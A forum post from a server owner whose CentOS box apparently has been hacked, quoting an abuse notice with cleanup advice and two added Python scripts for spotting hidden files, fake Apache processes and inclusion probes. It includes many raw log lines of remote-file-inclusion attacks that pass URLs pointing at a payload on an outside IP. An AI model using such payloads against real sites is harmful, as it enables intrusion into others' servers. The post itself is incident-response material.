I think my server has been hacked and it's attacking other servers..
I thought my colo was off his rocker when he first complained to me yesterday.. Today he got another notification from a different source...
Need an experienced Linux/CentOS server admin to check out my server and correct any issues he/she may find..
======================
NOTES:
This type of attack typically means the server to which the IP address of the attacker is bound is a compromised server.
Please check the server behind the IP address above for suspicious files in /tmp, /var/tmp, /dev/shm, /var/spool/samba, /var/spool/vbox, /var/spool/squid, and /var/spool/cron. Please use "ls -lab" for checking directories, as sometimes compromised servers will have hidden files that a regular "ls" will not show.
Please also check the process tree (ps -efl or ps -auwx) for suspicious processes; oftentimes the malware / hack pretends to be an Apache process.
Linux Malware Detect is an excellent program for finding malware on a server. You can find the latest version at http://www.rfxn.com/projects/linux-malware-detect/
Clam Anti-virus, clamscan, can also be used to find commonly used PHP and Perl-based hacks, including various PHP shells, on a server using the "--infected" and "--recursive" options.
You may also want to check out rootkit detection tools - http://www.chkrootkit.org/, http://www.rootkit.nl/, and http://www.ossec.net/en/rootcheck.html - which should be used in addition to checking the directories and process tree.
### EOF NOTES ###
Please take appropriate action to stop these attacks from happening.
Thank you very much for your time.
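The directory and process checks the notice asks for, as an added Python triage script (not code from the notice or from the original poster). It takes the scratch directories straight from the notice; the Apache binary paths in APACHE_EXES are an assumption for a stock CentOS box and should be adjusted to the real build.

```python
import os
# Directories the notice asks to inspect; dot-named entries there are a common sign
SCRATCH_DIRS = ("/tmp", "/var/tmp", "/dev/shm", "/var/spool/samba",
                "/var/spool/vbox", "/var/spool/squid", "/var/spool/cron")
# Legitimate Apache binaries on a stock CentOS box (assumption: adjust to your build)
APACHE_NAMES = {"httpd", "apache2"}
APACHE_EXES = {"/usr/sbin/httpd", "/usr/sbin/httpd.worker", "/usr/sbin/apache2"}

def hidden_entries(dirs=SCRATCH_DIRS, listdir=os.listdir):
    """Dot-named entries per directory: what 'ls -lab' shows and a plain 'ls' hides."""
    found = []
    for d in dirs:
        try:
            names = listdir(d)
        except OSError:
            continue  # directory absent or unreadable
        found.extend((d, n) for n in sorted(names) if n.startswith("."))
    return found

def _under(path, roots):
    return any(path == r or path.startswith(r + "/") for r in roots)
def classify_process(comm, exe, cwd):
    """Reason string if a process matches the notice's 'fake Apache' pattern, else None."""
    if exe.endswith(" (deleted)"):
        return "binary deleted after start (common for dropped malware)"
    if comm in APACHE_NAMES and exe not in APACHE_EXES:
        return f"named like Apache but executing {exe}"
    if _under(exe, SCRATCH_DIRS):
        return f"executable lives in scratch dir: {exe}"
    if _under(cwd, SCRATCH_DIRS):
        return f"working directory is a scratch dir: {cwd}"
    return None

def scan_proc():
    """Walk /proc (run as root for full coverage) and classify every process."""
    flagged = []
    entries = os.listdir("/proc") if os.path.isdir("/proc") else []
    for pid in filter(str.isdigit, entries):
        base = f"/proc/{pid}"
        try:
            with open(f"{base}/comm") as f:
                comm = f.read().strip()
            exe, cwd = os.readlink(f"{base}/exe"), os.readlink(f"{base}/cwd")
        except OSError:
            continue  # process exited, or not readable by this user
        reason = classify_process(comm, exe, cwd)
        if reason:
            flagged.append((int(pid), comm, reason))
    return flagged
```

Run it as root so every /proc/<pid>/exe is readable; a "binary deleted" hit can also be a package that was upgraded while running, so each flag still needs a manual look.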
Code:
Type of attack:
Sample log report including date and time stamp (1st field is the word "request", 2nd field is the IP address or the domain name being attacked, and the 3rd field is the IP address or domain name of the attacker):
Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:33:36 +0000] "GET /index.php?lang=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518 "-" "-" UK-doFQz7pAAADzVrsk "-"
Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:33:48 +0000] "GET /index.php?main=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518 "-" "-" UK-drFQz7pAAAF0ChVY "-"
Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:33:59 +0000] "GET /index.php?go=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518 "-" "-" UK-dt1Qz7pAAADzLoi8 "-"
Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:34:10 +0000] "GET /index.php?goto=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518 "-" "-" UK-dwlQz7pAAADzInIY "-"
Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:34:21 +0000] "GET /index.php?jump=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518 "-" "-" UK-dzVQz7pAAADzFmuE "-"
Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:34:32 +0000] "GET /index.php?url=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518 "-" "-" UK-d2FQz7pAAAF1no7s "-"
Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:34:43 +0000] "GET /index.php?lng=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518 "-" "-" UK-d41Qz7pAAADzdvYM "-"
Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:34:54 +0000] "GET /index.php?get=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518 "-" "-" UK-d7lQz7pAAADywcZ0 "-"
Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:35:05 +0000] "GET /index.php?link=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518 "-" "-" UK-d@VQz7pAAADy9lTA "-"
Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:35:16 +0000] "GET /index.php?open=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518 "-" "-" UK-eBFQz7pAAADzfwII "-"
Request: thelimousinecompany.ie 204.15.197.36 - - [23/Nov/2012:20:58:53 +0000] "GET /index.php?lang=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-jjVQz7pAAAGMpHwk "-"
Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:20:58:53 +0000] "GET /index.php?lang=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-jjVQz7pAAAGM3K@A "-"
Request: thelimousinecompany.ie 204.15.197.36 - - [23/Nov/2012:20:59:05 +0000] "GET /index.php?main=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-jmVQz7pAAABz8XSc "-"
Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:20:59:06 +0000] "GET /index.php?main=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-jmlQz7pAAABx2DqI "-"
Request: thelimousinecompany.ie 204.15.197.36 - - [23/Nov/2012:20:59:17 +0000] "GET /index.php?go=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-jpVQz7pAAAGMpHww "-"
Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:20:59:17 +0000] "GET /index.php?go=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-jpVQz7pAAABx8GVM "-"
Request: thelimousinecompany.ie 204.15.197.36 - - [23/Nov/2012:20:59:29 +0000] "GET /index.php?goto=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-jsVQz7pAAADzPqGw "-"
Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:20:59:29 +0000] "GET /index.php?goto=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-jsVQz7pAAADzSqfc "-"
Request: thelimousinecompany.ie 204.15.197.36 - - [23/Nov/2012:20:59:40 +0000] "GET /index.php?jump=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-jvFQz7pAAABx4Ebg "-"
Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:20:59:40 +0000] "GET /index.php?jump=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-jvFQz7pAAAByOINM "-"
Request: thelimousinecompany.ie 204.15.197.36 - - [23/Nov/2012:20:59:51 +0000] "GET /index.php?url=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-jx1Qz7pAAABx2Dqw "-"
Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:20:59:51 +0000] "GET /index.php?url=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-jx1Qz7pAAAGMrI-U "-"
Request: thelimousinecompany.ie 204.15.197.36 - - [23/Nov/2012:21:00:03 +0000] "GET /index.php?lng=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-j01Qz7pAAAGMrI-c "-"
Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:21:00:03 +0000] "GET /index.php?lng=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-j01Qz7pAAAGMpHxM "-"
Request: thelimousinecompany.ie 204.15.197.36 - - [23/Nov/2012:21:00:15 +0000] "GET /index.php?get=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-j31Qz7pAAAGMpHxU "-"
Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:21:00:15 +0000] "GET /index.php?get=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-j31Qz7pAAABx2DrI "-"
Request: thelimousinecompany.ie 204.15.197.36 - - [23/Nov/2012:21:00:27 +0000] "GET /index.php?link=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-j61Qz7pAAADzKodQ "-"
Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:21:00:28 +0000] "GET /index.php?link=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-j7FQz7pAAADzFm8I "-"
TIA
Ed
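Detection logic over the report's own log lines, as an added example that is not from the notice or the poster: it parses the "Request:" layout described in the report, flags query parameters whose value is a remote URL (the remote-file-inclusion probe the lines show), and groups hits by source IP. The 198.51.100.7 line is constructed as a benign request for contrast.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# One entry per line in the notifier's layout: "Request: <vhost> <client> - - [<time>]
# "<method> <target> <proto>" <status> <bytes> ..." (a combined log prefixed with the vhost)
LINE_RE = re.compile(
    r'^Request:\s+(?P<vhost>\S+)\s+(?P<client>\S+)\s+\S+\s+\S+\s+\[(?P<time>[^\]]+)\]\s+'
    r'"(?P<method>\S+)\s+(?P<target>\S+)\s+[^"]*"\s+(?P<status>\d{3})\s+(?P<bytes>\S+)'
)
REMOTE_SCHEMES = ("http://", "https://", "ftp://")

# Three lines from the report above plus one constructed benign request (198.51.100.7)
SAMPLE = """\
Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:33:36 +0000] "GET /index.php?lang=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518 "-" "-" UK-doFQz7pAAADzVrsk "-"
Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:33:48 +0000] "GET /index.php?main=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518 "-" "-" UK-drFQz7pAAAF0ChVY "-"
Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:20:58:53 +0000] "GET /index.php?lang=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-jjVQz7pAAAGM3K@A "-"
Request: darklite.ie 198.51.100.7 - - [23/Nov/2012:20:40:00 +0000] "GET /index.php?lang=en HTTP/1.1" 200 4120 "-" "Mozilla/5.0" UK-constructed000 "-"
"""

def parse_line(line):
    """Fields of one report line, or None if the line is not in that layout."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None

def remote_includes(target):
    """(param, value) pairs whose value is a remote URL, i.e. a file-inclusion probe."""
    query = urlsplit(target).query
    return [(name, value) for name, value in parse_qsl(query, keep_blank_values=True)
            if value.strip().lower().startswith(REMOTE_SCHEMES)]

def summarize(lines):
    """Per source IP: how many probes, which vhosts and parameters, where the payload lives."""
    report = defaultdict(lambda: {"requests": 0, "vhosts": set(), "params": set(), "payload_hosts": set()})
    for line in lines:
        rec = parse_line(line.strip())
        if rec is None:
            continue  # not a report line (blank, header, wrapped fragment)
        hits = remote_includes(rec["target"])
        if not hits:
            continue  # ordinary request, nothing to report
        entry = report[rec["client"]]
        entry["requests"] += 1
        entry["vhosts"].add(rec["vhost"])
        for name, url in hits:
            entry["params"].add(name)
            entry["payload_hosts"].add(urlsplit(url).hostname)
    return dict(report)
```

Feeding the full "Code:" block above through summarize() collects every parameter name probed and both payload hosts and targets in one place, which is what the abuse desk needs when deciding whether the source IP is yours.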